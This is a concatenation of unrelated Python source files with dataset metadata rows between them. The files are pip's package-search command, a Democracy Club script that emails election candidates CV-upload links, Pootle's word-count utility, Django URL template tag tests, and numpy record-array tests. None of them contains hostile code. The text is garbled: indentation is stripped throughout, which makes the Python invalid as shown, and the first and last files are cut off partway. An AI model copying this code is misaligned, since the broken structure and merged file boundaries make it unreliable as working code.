from pip._vendor import pkg_resources
from distutils.version import StrictVersion, LooseVersion
class SearchCommand(Command):
"""Search for PyPI packages whose name or summary contains <query>."""
name = 'search'
usage = """
%prog [options] <query>"""
summary = 'Search PyPI for packages.'
def __init__(self, *args, **kw):
super(SearchCommand, self).__init__(*args, **kw)
self.cmd_opts.add_option(
'--index',
dest='index',
metavar='URL',
default='https://pypi.python.org/pypi',
help='Base URL of Python Package Index (default %default)')
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
if not args:
raise CommandError('Missing required argument (search query).')
query = args
index_url = options.index
pypi_hits = self.search(query, index_url)
hits = transform_hits(pypi_hits)
terminal_width = None
if sys.stdout.isatty():
terminal_width = get_terminal_size()[0]
print_results(hits, terminal_width=terminal_width)
if pypi_hits:
return SUCCESS
return NO_MATCHES_FOUND
def search(self, query, index_url):
pypi = xmlrpclib.ServerProxy(index_url)
hits = pypi.search({'name': query, 'summary': query}, 'or')
return hits
def transform_hits(hits):
"""
The list from pypi is really a list of versions. We want a list of
packages with the list of versions stored inline. This converts the
list from pypi into one we can use.
"""
packages = {}
for hit in hits:
name = hit['name']
summary = hit['summary']
version = hit['version']
score = hit['_pypi_ordering']
if score is None:
score = 0
if name not in packages.keys():
packages[name] = {'name': name, 'summary': summary, 'versions': [version], 'score': score}
else:
packages[name]['versions'].append(version)
# if this is the highest version, replace summary and score
if version == highest_version(packages[name]['versions']):
packages[name]['summary'] = summary
packages[name]['score'] = score
# each record has a unique name now, so we will convert the dict into a list sorted by score
package_list = sorted(packages.values(), key=lambda x: x['score'], reverse=True)
return package_list
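# Sketch of the transformation above (added for clarity): a PyPI hit list like
#   [{'name': 'pip', 'summary': 's1', 'version': '1.4', '_pypi_ordering': 5},
#    {'name': 'pip', 'summary': 's2', 'version': '1.5', '_pypi_ordering': 6}]
# collapses into one record per package, keeping the summary and score of the
# highest version:
#   [{'name': 'pip', 'summary': 's2', 'versions': ['1.4', '1.5'], 'score': 6}]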
def print_results(hits, name_column_width=25, terminal_width=None):
installed_packages = [p.project_name for p in pkg_resources.working_set]
for hit in hits:
name = hit['name']
summary = hit['summary'] or ''
if terminal_width is not None:
# wrap and indent summary to fit terminal
summary = textwrap.wrap(summary, terminal_width - name_column_width - 5)
summary = ('\n' + ' ' * (name_column_width + 3)).join(summary)
line = '%s - %s' % (name.ljust(name_column_width), summary)
try:
logger.notify(line)
if name in installed_packages:
dist = pkg_resources.get_distribution(name)
logger.indent += 2
try:
latest = highest_version(hit['versions'])
if dist.version == latest:
logger.notify('INSTALLED: %s (latest)' % dist.version)
else:
logger.notify('INSTALLED: %s' % dist.version)
logger.notify('LATEST: %s' % latest)
finally:
logger.indent -= 2
except UnicodeEncodeError:
pass
def compare_versions(version1, version2):
try:
return cmp(StrictVersion(version1), StrictVersion(version2))
# in case of abnormal version number, fall back to LooseVersion
except ValueError:
pass
try:
return cmp(LooseVersion(version1), LooseVersion(version2))
except TypeError:
        # certain LooseVersion comparisons raise due to unorderable types,
# fallback to string comparison
return cmp([str(v) for v in LooseVersion(version1).version],
[str(v) for v in LooseVersion(version2).version])
def highest_version(versions):
return reduce((lambda v1, v2: compare_versions(v1, v2) == 1 and v1 or v2), versions)
| bsd-3-clause | -1,124,570,996,603,187,500 | 34.878788 | 102 | 0.603463 | false |
frabcus/mpcv | bin/parl.2017-06-08/01-all-candidates.py | 1 | 2347 | #!/usr/bin/env python3
import sys
import os
import collections
import datetime
import flask_mail
import boto.s3.key
sys.path.append(os.getcwd())
import app
import identity
import lookups
app.app.config['SERVER_NAME'] = 'cv.democracyclub.org.uk'
# Get list of when last sent
last_sent_by_email = lookups.candidate_mail_last_sent(app.app.config)
with app.app.app_context():
for constituency in lookups.all_constituencies(app.app.config):
for candidate in constituency:
if candidate['id'] in [5819]:
print("unsubscribed", candidate)
continue
if candidate['has_cv']:
continue
if not candidate['email']:
continue
# Only mail to ones we haven't mailed recently
if candidate['email'] in last_sent_by_email:
back_to = datetime.datetime.now() - datetime.timedelta(days=14)
last_sent = last_sent_by_email[candidate['email']]
if last_sent > back_to:
print("skipping too recent", candidate['email'], last_sent, ">", back_to)
continue
link = identity.generate_upload_url(app.app.secret_key, candidate['id'])
body = '''Hi!
Great that you're standing for Parliament again!
At the last General Election, we found voters love to
learn more about you by seeing the career history on your
CV.
To share your CV with voters, follow this link.
{link}
If you're having trouble, reply to this email with an
attachment!
Many thanks,
Francis
Volunteer, Democracy Club CVs
http://cv.democracyclub.org.uk/
'''.format(link=link, linkedin_url=candidate['linkedin_url'], name=candidate['name'])
print("sending to: " + candidate['email'])
# For debugging:
#print("\n" + body)
#candidate['email'] = '[email protected]'
msg = flask_mail.Message(body=body,
subject="Your voters would like to see your CV!",
sender=("Democracy Club CVs", "[email protected]"),
recipients=[
(candidate['name'], candidate['email'])
]
)
app.mail.send(msg)
lookups.candidate_mail_sent(app.app.config, candidate['email'])
| agpl-3.0 | -7,220,414,835,251,594,000 | 28.3375 | 93 | 0.597358 | false |
pavels/pootle | pootle/core/utils/wordcount.py | 4 | 4873 | # -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import re
re._MAXCACHE = 1000
remove = re.compile(u"[\.]+", re.U) # dots
delimiters = re.compile(u"[\W]+", re.U) # anything except a-z, A-Z and _
delimiters_begin = re.compile(u"^[\W]+",
re.U) # anything except a-z, A-Z and _
delimiters_end = re.compile(u"[\W]+$", re.U) # anything except a-z, A-Z and _
english_date = re.compile(
u"(^|\W)(January|February|March|April|May|June|July|August|September|"
u"October|November|December)\s+\d{1,2},\s+(?:\d{2})?\d{2}(\W|$)",
re.U
)
escaped_xmltag_regex = re.compile(u'(<\/?[\w]+.*?>)', re.U)
xmltag_regex = re.compile(u'(<\/?[\w]+.*?>)', re.U)
java_format_regex = re.compile(u'(\\\{\d+\\\}|\{\d+\})', re.U)
template_format_regex = re.compile(u'(\$\{[\w\.\:]+\})', re.U)
android_format_regex = re.compile(u'(%\d\$\w)', re.U)
sprintf_regex = re.compile(u'(%[\d]*(?:.\d+)*(?:h|l|I|I32|I64)*[cdiouxefgns])',
re.U)
objective_c_regex = re.compile(u'(%@)', re.U)
dollar_sign_regex = re.compile(u'(\$[\w\d]+?\$)', re.U)
persent_sign_regex = re.compile(u'(\%[\w\d]+?\%)', re.U)
newline_regex = re.compile(u'(\{\\\n\})', re.U)
escaping_sqc_regex = re.compile(u'(\\\+[rnt])', re.U)
xml_entities_regex = re.compile(u'(&#\d+;|&\w+;)', re.U)
product_names_regex = re.compile(
u"(Evernote International|Evernote Food|Evernote Hello|Evernote Clearly|"
u"Evernote Business|Skitch|Evernote®?|Food|^Hello$|Clearly)",
re.U
)
shortcuts_regex = re.compile(u'(Ctrl\+\w$|Shift\+\w$|Alt\+\w$)', re.U)
shortcuts_modifier_regex = re.compile(u'(Ctrl\+$|Shift\+$|Alt\+$)', re.U)
hanging_symbols_regex = \
re.compile(u'(^[^\w\&]\s|\s[^\w\&]\s|\s[^\w\&]$|^[^\w\&]$)', re.U)
def find_placeholders(aref, regex, cls=''):
# regex is compiled re object with pattern surrounded by "()"
i = 0
while i < len(aref):
chunk = aref[i]
if not chunk['translate']:
i += 1
else:
subchunks = regex.split(chunk['string'])
a = []
translate = False
for subchunk in subchunks:
translate = not translate
a.append({
'translate': translate,
'string': subchunk,
'class': cls
})
aref[i:i+1] = a
i += len(a)
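# Added note: re.split() with a capturing group returns plain text and captured
# placeholders alternately (starting with plain text), which is why `translate`
# is simply toggled for each subchunk above.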
def wordcount(string):
string = re.sub('\n', '{\\n}', string)
chunks = [{
'translate': 1,
'string': u'%s' % string,
}]
# FIXME: provide line continuations to fit lines below 80 chars
# Escaped XML tags (used in some strings)
find_placeholders(chunks, escaped_xmltag_regex)
# XML tags
find_placeholders(chunks, xmltag_regex)
# Java format and it's escaped version
find_placeholders(chunks, java_format_regex)
# Template format
find_placeholders(chunks, template_format_regex)
# Android format
find_placeholders(chunks, android_format_regex)
# sprintf
find_placeholders(chunks, sprintf_regex)
# Objective C style placeholders
find_placeholders(chunks, objective_c_regex)
# Dollar sign placeholders
find_placeholders(chunks, dollar_sign_regex)
# Percent sign placeholders
find_placeholders(chunks, persent_sign_regex)
# '{\n}' newline marker
find_placeholders(chunks, newline_regex)
# Escaping sequences (\n, \r, \t)
find_placeholders(chunks, escaping_sqc_regex)
# XML entities
find_placeholders(chunks, xml_entities_regex)
# Product names
find_placeholders(chunks, product_names_regex)
# Shortcuts
find_placeholders(chunks, shortcuts_regex)
# Shortcut modifiers
find_placeholders(chunks, shortcuts_modifier_regex)
# Find patterns that are not counted as words in Trados
# Hanging symbols (excluding a-z, _ and &)
find_placeholders(chunks, hanging_symbols_regex, 'dont-count')
return _count_words(chunks)
def _count_words(aref):
# These rules are based on observed Trados 2007 word calculation behavior
n = 0
for chunk in aref:
if chunk['translate']:
s = chunk['string']
# Replace the date with just the month name (i.e. count as a single
# word)
s = english_date.sub(u'\g<1>\g<2>\g<3>', s)
s = remove.sub(u'', s)
s = delimiters_begin.sub(u'', s)
s = delimiters_end.sub(u'', s)
a = delimiters.split(s)
if len(a) > 1 and a[-1] == u'':
a.pop()
if len(a) == 1 and a[0] == u'':
a.pop()
n += len(a)
return n
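# Example (added, not part of the module): wordcount(u"Hello, world!") returns
# 2 -- trailing punctuation is stripped by delimiters_end and the remaining
# string is split on non-word characters.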
| gpl-3.0 | 2,861,978,391,407,678,500 | 31.697987 | 79 | 0.579023 | false |
wkschwartz/django | tests/template_tests/syntax_tests/test_url.py | 34 | 11815 | from django.template import RequestContext, TemplateSyntaxError
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.urls import NoReverseMatch, resolve
from ..utils import setup
@override_settings(ROOT_URLCONF='template_tests.urls')
class UrlTagTests(SimpleTestCase):
request_factory = RequestFactory()
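    # Note (added): ROOT_URLCONF is overridden above so the {% url %} tag
    # reverses names such as "client" and "named.client" against
    # template_tests.urls rather than the project-wide URLconf.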
# Successes
@setup({'url01': '{% url "client" client.id %}'})
def test_url01(self):
output = self.engine.render_to_string('url01', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/')
@setup({'url02': '{% url "client_action" id=client.id action="update" %}'})
def test_url02(self):
output = self.engine.render_to_string('url02', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/update/')
@setup({'url02a': '{% url "client_action" client.id "update" %}'})
def test_url02a(self):
output = self.engine.render_to_string('url02a', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/update/')
@setup({'url02b': "{% url 'client_action' id=client.id action='update' %}"})
def test_url02b(self):
output = self.engine.render_to_string('url02b', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/update/')
@setup({'url02c': "{% url 'client_action' client.id 'update' %}"})
def test_url02c(self):
output = self.engine.render_to_string('url02c', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/update/')
@setup({'url03': '{% url "index" %}'})
def test_url03(self):
output = self.engine.render_to_string('url03')
self.assertEqual(output, '/')
@setup({'url04': '{% url "named.client" client.id %}'})
def test_url04(self):
output = self.engine.render_to_string('url04', {'client': {'id': 1}})
self.assertEqual(output, '/named-client/1/')
@setup({'url05': '{% url "метка_оператора" v %}'})
def test_url05(self):
output = self.engine.render_to_string('url05', {'v': 'Ω'})
self.assertEqual(output, '/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/')
@setup({'url06': '{% url "метка_оператора_2" tag=v %}'})
def test_url06(self):
output = self.engine.render_to_string('url06', {'v': 'Ω'})
self.assertEqual(output, '/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/')
@setup({'url08': '{% url "метка_оператора" v %}'})
def test_url08(self):
output = self.engine.render_to_string('url08', {'v': 'Ω'})
self.assertEqual(output, '/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/')
@setup({'url09': '{% url "метка_оператора_2" tag=v %}'})
def test_url09(self):
output = self.engine.render_to_string('url09', {'v': 'Ω'})
self.assertEqual(output, '/%D0%AE%D0%BD%D0%B8%D0%BA%D0%BE%D0%B4/%CE%A9/')
@setup({'url10': '{% url "client_action" id=client.id action="two words" %}'})
def test_url10(self):
output = self.engine.render_to_string('url10', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/two%20words/')
@setup({'url11': '{% url "client_action" id=client.id action="==" %}'})
def test_url11(self):
output = self.engine.render_to_string('url11', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/==/')
@setup({'url12': '{% url "client_action" id=client.id action="!$&\'()*+,;=~:@," %}'})
def test_url12(self):
output = self.engine.render_to_string('url12', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/!$&'()*+,;=~:@,/')
@setup({'url13': '{% url "client_action" id=client.id action=arg|join:"-" %}'})
def test_url13(self):
output = self.engine.render_to_string('url13', {'client': {'id': 1}, 'arg': ['a', 'b']})
self.assertEqual(output, '/client/1/a-b/')
@setup({'url14': '{% url "client_action" client.id arg|join:"-" %}'})
def test_url14(self):
output = self.engine.render_to_string('url14', {'client': {'id': 1}, 'arg': ['a', 'b']})
self.assertEqual(output, '/client/1/a-b/')
@setup({'url15': '{% url "client_action" 12 "test" %}'})
def test_url15(self):
output = self.engine.render_to_string('url15')
self.assertEqual(output, '/client/12/test/')
@setup({'url18': '{% url "client" "1,2" %}'})
def test_url18(self):
output = self.engine.render_to_string('url18')
self.assertEqual(output, '/client/1,2/')
@setup({'url19': '{% url named_url client.id %}'})
def test_url19(self):
output = self.engine.render_to_string(
'url19', {'client': {'id': 1}, 'named_url': 'client'}
)
self.assertEqual(output, '/client/1/')
@setup({'url20': '{% url url_name_in_var client.id %}'})
def test_url20(self):
output = self.engine.render_to_string('url20', {'client': {'id': 1}, 'url_name_in_var': 'named.client'})
self.assertEqual(output, '/named-client/1/')
@setup({'url21': '{% autoescape off %}'
'{% url "client_action" id=client.id action="!$&\'()*+,;=~:@," %}'
'{% endautoescape %}'})
def test_url21(self):
output = self.engine.render_to_string('url21', {'client': {'id': 1}})
self.assertEqual(output, '/client/1/!$&\'()*+,;=~:@,/')
# Failures
@setup({'url-fail01': '{% url %}'})
def test_url_fail01(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail01')
@setup({'url-fail02': '{% url "no_such_view" %}'})
def test_url_fail02(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail02')
@setup({'url-fail03': '{% url "client" %}'})
def test_url_fail03(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail03')
@setup({'url-fail04': '{% url "view" id, %}'})
def test_url_fail04(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail04')
@setup({'url-fail05': '{% url "view" id= %}'})
def test_url_fail05(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail05')
@setup({'url-fail06': '{% url "view" a.id=id %}'})
def test_url_fail06(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail06')
@setup({'url-fail07': '{% url "view" a.id!id %}'})
def test_url_fail07(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail07')
@setup({'url-fail08': '{% url "view" id="unterminatedstring %}'})
def test_url_fail08(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail08')
@setup({'url-fail09': '{% url "view" id=", %}'})
def test_url_fail09(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('url-fail09')
@setup({'url-fail11': '{% url named_url %}'})
def test_url_fail11(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail11')
@setup({'url-fail12': '{% url named_url %}'})
def test_url_fail12(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail12', {'named_url': 'no_such_view'})
@setup({'url-fail13': '{% url named_url %}'})
def test_url_fail13(self):
with self.assertRaises(NoReverseMatch):
self.engine.render_to_string('url-fail13', {'named_url': 'template_tests.views.client'})
@setup({'url-fail14': '{% url named_url id, %}'})
def test_url_fail14(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail14', {'named_url': 'view'})
@setup({'url-fail15': '{% url named_url id= %}'})
def test_url_fail15(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail15', {'named_url': 'view'})
@setup({'url-fail16': '{% url named_url a.id=id %}'})
def test_url_fail16(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail16', {'named_url': 'view'})
@setup({'url-fail17': '{% url named_url a.id!id %}'})
def test_url_fail17(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail17', {'named_url': 'view'})
@setup({'url-fail18': '{% url named_url id="unterminatedstring %}'})
def test_url_fail18(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail18', {'named_url': 'view'})
@setup({'url-fail19': '{% url named_url id=", %}'})
def test_url_fail19(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail19', {'named_url': 'view'})
# {% url ... as var %}
@setup({'url-asvar01': '{% url "index" as url %}'})
def test_url_asvar01(self):
output = self.engine.render_to_string('url-asvar01')
self.assertEqual(output, '')
@setup({'url-asvar02': '{% url "index" as url %}{{ url }}'})
def test_url_asvar02(self):
output = self.engine.render_to_string('url-asvar02')
self.assertEqual(output, '/')
@setup({'url-asvar03': '{% url "no_such_view" as url %}{{ url }}'})
def test_url_asvar03(self):
output = self.engine.render_to_string('url-asvar03')
self.assertEqual(output, '')
@setup({'url-namespace01': '{% url "app:named.client" 42 %}'})
def test_url_namespace01(self):
request = self.request_factory.get('/')
request.resolver_match = resolve('/ns1/')
template = self.engine.get_template('url-namespace01')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns1/named-client/42/')
@setup({'url-namespace02': '{% url "app:named.client" 42 %}'})
def test_url_namespace02(self):
request = self.request_factory.get('/')
request.resolver_match = resolve('/ns2/')
template = self.engine.get_template('url-namespace02')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns2/named-client/42/')
@setup({'url-namespace03': '{% url "app:named.client" 42 %}'})
def test_url_namespace03(self):
request = self.request_factory.get('/')
template = self.engine.get_template('url-namespace03')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns2/named-client/42/')
@setup({'url-namespace-no-current-app': '{% url "app:named.client" 42 %}'})
def test_url_namespace_no_current_app(self):
request = self.request_factory.get('/')
request.resolver_match = resolve('/ns1/')
request.current_app = None
template = self.engine.get_template('url-namespace-no-current-app')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns2/named-client/42/')
@setup({'url-namespace-explicit-current-app': '{% url "app:named.client" 42 %}'})
def test_url_namespace_explicit_current_app(self):
request = self.request_factory.get('/')
request.resolver_match = resolve('/ns1/')
request.current_app = 'app'
template = self.engine.get_template('url-namespace-explicit-current-app')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns2/named-client/42/')
| bsd-3-clause | -5,389,943,958,253,432,000 | 42.058608 | 112 | 0.595151 | false |
argriffing/numpy | numpy/core/tests/test_records.py | 5 | 13700 | from __future__ import division, absolute_import, print_function
import sys
import collections
import pickle
from os import path
import numpy as np
from numpy.compat import asbytes
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_equal, assert_array_equal,
assert_array_almost_equal, assert_raises
)
class TestFromrecords(TestCase):
def test_fromrecords(self):
r = np.rec.fromrecords([[456, 'dbe', 1.2], [2, 'de', 1.3]],
names='col1,col2,col3')
assert_equal(r[0].item(), (456, 'dbe', 1.2))
assert_equal(r['col1'].dtype.kind, 'i')
if sys.version_info[0] >= 3:
assert_equal(r['col2'].dtype.kind, 'U')
assert_equal(r['col2'].dtype.itemsize, 12)
else:
assert_equal(r['col2'].dtype.kind, 'S')
assert_equal(r['col2'].dtype.itemsize, 3)
assert_equal(r['col3'].dtype.kind, 'f')
def test_method_array(self):
r = np.rec.array(asbytes('abcdefg') * 100, formats='i2,a3,i4', shape=3, byteorder='big')
assert_equal(r[1].item(), (25444, asbytes('efg'), 1633837924))
def test_method_array2(self):
r = np.rec.array([(1, 11, 'a'), (2, 22, 'b'), (3, 33, 'c'), (4, 44, 'd'), (5, 55, 'ex'),
(6, 66, 'f'), (7, 77, 'g')], formats='u1,f4,a1')
assert_equal(r[1].item(), (2, 22.0, asbytes('b')))
def test_recarray_slices(self):
r = np.rec.array([(1, 11, 'a'), (2, 22, 'b'), (3, 33, 'c'), (4, 44, 'd'), (5, 55, 'ex'),
(6, 66, 'f'), (7, 77, 'g')], formats='u1,f4,a1')
assert_equal(r[1::2][1].item(), (4, 44.0, asbytes('d')))
def test_recarray_fromarrays(self):
x1 = np.array([1, 2, 3, 4])
x2 = np.array(['a', 'dd', 'xyz', '12'])
x3 = np.array([1.1, 2, 3, 4])
r = np.rec.fromarrays([x1, x2, x3], names='a,b,c')
assert_equal(r[1].item(), (2, 'dd', 2.0))
x1[1] = 34
assert_equal(r.a, np.array([1, 2, 3, 4]))
def test_recarray_fromfile(self):
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, 'recarray_from_file.fits')
fd = open(filename, 'rb')
fd.seek(2880 * 2)
r1 = np.rec.fromfile(fd, formats='f8,i4,a5', shape=3, byteorder='big')
fd.seek(2880 * 2)
r2 = np.rec.array(fd, formats='f8,i4,a5', shape=3, byteorder='big')
fd.close()
assert_equal(r1, r2)
def test_recarray_from_obj(self):
count = 10
a = np.zeros(count, dtype='O')
b = np.zeros(count, dtype='f8')
c = np.zeros(count, dtype='f8')
for i in range(len(a)):
a[i] = list(range(1, 10))
mine = np.rec.fromarrays([a, b, c], names='date,data1,data2')
for i in range(len(a)):
assert_((mine.date[i] == list(range(1, 10))))
assert_((mine.data1[i] == 0.0))
assert_((mine.data2[i] == 0.0))
def test_recarray_from_repr(self):
a = np.array([(1,'ABC'), (2, "DEF")],
dtype=[('foo', int), ('bar', 'S4')])
recordarr = np.rec.array(a)
recarr = a.view(np.recarray)
recordview = a.view(np.dtype((np.record, a.dtype)))
recordarr_r = eval("numpy." + repr(recordarr), {'numpy': np})
recarr_r = eval("numpy." + repr(recarr), {'numpy': np})
recordview_r = eval("numpy." + repr(recordview), {'numpy': np})
assert_equal(type(recordarr_r), np.recarray)
assert_equal(recordarr_r.dtype.type, np.record)
assert_equal(recordarr, recordarr_r)
assert_equal(type(recarr_r), np.recarray)
assert_equal(recarr_r.dtype.type, np.record)
assert_equal(recarr, recarr_r)
assert_equal(type(recordview_r), np.ndarray)
assert_equal(recordview.dtype.type, np.record)
assert_equal(recordview, recordview_r)
def test_recarray_views(self):
a = np.array([(1,'ABC'), (2, "DEF")],
dtype=[('foo', int), ('bar', 'S4')])
b = np.array([1,2,3,4,5], dtype=np.int64)
#check that np.rec.array gives right dtypes
assert_equal(np.rec.array(a).dtype.type, np.record)
assert_equal(type(np.rec.array(a)), np.recarray)
assert_equal(np.rec.array(b).dtype.type, np.int64)
assert_equal(type(np.rec.array(b)), np.recarray)
#check that viewing as recarray does the same
assert_equal(a.view(np.recarray).dtype.type, np.record)
assert_equal(type(a.view(np.recarray)), np.recarray)
assert_equal(b.view(np.recarray).dtype.type, np.int64)
assert_equal(type(b.view(np.recarray)), np.recarray)
#check that view to non-structured dtype preserves type=np.recarray
r = np.rec.array(np.ones(4, dtype="f4,i4"))
rv = r.view('f8').view('f4,i4')
assert_equal(type(rv), np.recarray)
assert_equal(rv.dtype.type, np.record)
#check that getitem also preserves np.recarray and np.record
r = np.rec.array(np.ones(4, dtype=[('a', 'i4'), ('b', 'i4'),
('c', 'i4,i4')]))
assert_equal(r['c'].dtype.type, np.record)
assert_equal(type(r['c']), np.recarray)
assert_equal(r[['a', 'b']].dtype.type, np.record)
assert_equal(type(r[['a', 'b']]), np.recarray)
#and that it preserves subclasses (gh-6949)
class C(np.recarray):
pass
c = r.view(C)
assert_equal(type(c['c']), C)
# check that accessing nested structures keep record type, but
# not for subarrays, non-void structures, non-structured voids
test_dtype = [('a', 'f4,f4'), ('b', 'V8'), ('c', ('f4',2)),
('d', ('i8', 'i4,i4'))]
r = np.rec.array([((1,1), b'11111111', [1,1], 1),
((1,1), b'11111111', [1,1], 1)], dtype=test_dtype)
assert_equal(r.a.dtype.type, np.record)
assert_equal(r.b.dtype.type, np.void)
assert_equal(r.c.dtype.type, np.float32)
assert_equal(r.d.dtype.type, np.int64)
# check the same, but for views
r = np.rec.array(np.ones(4, dtype='i4,i4'))
assert_equal(r.view('f4,f4').dtype.type, np.record)
assert_equal(r.view(('i4',2)).dtype.type, np.int32)
assert_equal(r.view('V8').dtype.type, np.void)
assert_equal(r.view(('i8', 'i4,i4')).dtype.type, np.int64)
#check that we can undo the view
arrs = [np.ones(4, dtype='f4,i4'), np.ones(4, dtype='f8')]
for arr in arrs:
rec = np.rec.array(arr)
# recommended way to view as an ndarray:
arr2 = rec.view(rec.dtype.fields or rec.dtype, np.ndarray)
assert_equal(arr2.dtype.type, arr.dtype.type)
assert_equal(type(arr2), type(arr))
def test_recarray_repr(self):
# make sure non-structured dtypes also show up as rec.array
a = np.array(np.ones(4, dtype='f8'))
assert_(repr(np.rec.array(a)).startswith('rec.array'))
# check that the 'np.record' part of the dtype isn't shown
a = np.rec.array(np.ones(3, dtype='i4,i4'))
assert_equal(repr(a).find('numpy.record'), -1)
a = np.rec.array(np.ones(3, dtype='i4'))
assert_(repr(a).find('dtype=int32') != -1)
def test_recarray_from_names(self):
ra = np.rec.array([
(1, 'abc', 3.7000002861022949, 0),
(2, 'xy', 6.6999998092651367, 1),
(0, ' ', 0.40000000596046448, 0)],
names='c1, c2, c3, c4')
pa = np.rec.fromrecords([
(1, 'abc', 3.7000002861022949, 0),
(2, 'xy', 6.6999998092651367, 1),
(0, ' ', 0.40000000596046448, 0)],
names='c1, c2, c3, c4')
assert_(ra.dtype == pa.dtype)
assert_(ra.shape == pa.shape)
for k in range(len(ra)):
assert_(ra[k].item() == pa[k].item())
def test_recarray_conflict_fields(self):
ra = np.rec.array([(1, 'abc', 2.3), (2, 'xyz', 4.2),
(3, 'wrs', 1.3)],
names='field, shape, mean')
ra.mean = [1.1, 2.2, 3.3]
assert_array_almost_equal(ra['mean'], [1.1, 2.2, 3.3])
assert_(type(ra.mean) is type(ra.var))
ra.shape = (1, 3)
assert_(ra.shape == (1, 3))
ra.shape = ['A', 'B', 'C']
assert_array_equal(ra['shape'], [['A', 'B', 'C']])
ra.field = 5
assert_array_equal(ra['field'], [[5, 5, 5]])
assert_(isinstance(ra.field, collections.Callable))
def test_fromrecords_with_explicit_dtype(self):
a = np.rec.fromrecords([(1, 'a'), (2, 'bbb')],
dtype=[('a', int), ('b', np.object)])
assert_equal(a.a, [1, 2])
assert_equal(a[0].a, 1)
assert_equal(a.b, ['a', 'bbb'])
assert_equal(a[-1].b, 'bbb')
#
ndtype = np.dtype([('a', int), ('b', np.object)])
a = np.rec.fromrecords([(1, 'a'), (2, 'bbb')], dtype=ndtype)
assert_equal(a.a, [1, 2])
assert_equal(a[0].a, 1)
assert_equal(a.b, ['a', 'bbb'])
assert_equal(a[-1].b, 'bbb')
def test_recarray_stringtypes(self):
# Issue #3993
a = np.array([('abc ', 1), ('abc', 2)],
dtype=[('foo', 'S4'), ('bar', int)])
a = a.view(np.recarray)
assert_equal(a.foo[0] == a.foo[1], False)
def test_recarray_returntypes(self):
qux_fields = {'C': (np.dtype('S5'), 0), 'D': (np.dtype('S5'), 6)}
a = np.rec.array([('abc ', (1,1), 1, ('abcde', 'fgehi')),
('abc', (2,3), 1, ('abcde', 'jklmn'))],
dtype=[('foo', 'S4'),
('bar', [('A', int), ('B', int)]),
('baz', int), ('qux', qux_fields)])
assert_equal(type(a.foo), np.ndarray)
assert_equal(type(a['foo']), np.ndarray)
assert_equal(type(a.bar), np.recarray)
assert_equal(type(a['bar']), np.recarray)
assert_equal(a.bar.dtype.type, np.record)
assert_equal(type(a['qux']), np.recarray)
assert_equal(a.qux.dtype.type, np.record)
assert_equal(dict(a.qux.dtype.fields), qux_fields)
assert_equal(type(a.baz), np.ndarray)
assert_equal(type(a['baz']), np.ndarray)
assert_equal(type(a[0].bar), np.record)
assert_equal(type(a[0]['bar']), np.record)
assert_equal(a[0].bar.A, 1)
assert_equal(a[0].bar['A'], 1)
assert_equal(a[0]['bar'].A, 1)
assert_equal(a[0]['bar']['A'], 1)
assert_equal(a[0].qux.D, asbytes('fgehi'))
assert_equal(a[0].qux['D'], asbytes('fgehi'))
assert_equal(a[0]['qux'].D, asbytes('fgehi'))
assert_equal(a[0]['qux']['D'], asbytes('fgehi'))
class TestRecord(TestCase):
def setUp(self):
self.data = np.rec.fromrecords([(1, 2, 3), (4, 5, 6)],
dtype=[("col1", "<i4"),
("col2", "<i4"),
("col3", "<i4")])
def test_assignment1(self):
a = self.data
assert_equal(a.col1[0], 1)
a[0].col1 = 0
assert_equal(a.col1[0], 0)
def test_assignment2(self):
a = self.data
assert_equal(a.col1[0], 1)
a.col1[0] = 0
assert_equal(a.col1[0], 0)
def test_invalid_assignment(self):
a = self.data
def assign_invalid_column(x):
x[0].col5 = 1
self.assertRaises(AttributeError, assign_invalid_column, a)
def test_out_of_order_fields(self):
"""Ticket #1431."""
x = self.data[['col1', 'col2']]
y = self.data[['col2', 'col1']]
assert_equal(x[0][0], y[0][1])
def test_pickle_1(self):
# Issue #1529
a = np.array([(1, [])], dtype=[('a', np.int32), ('b', np.int32, 0)])
assert_equal(a, pickle.loads(pickle.dumps(a)))
assert_equal(a[0], pickle.loads(pickle.dumps(a[0])))
def test_pickle_2(self):
a = self.data
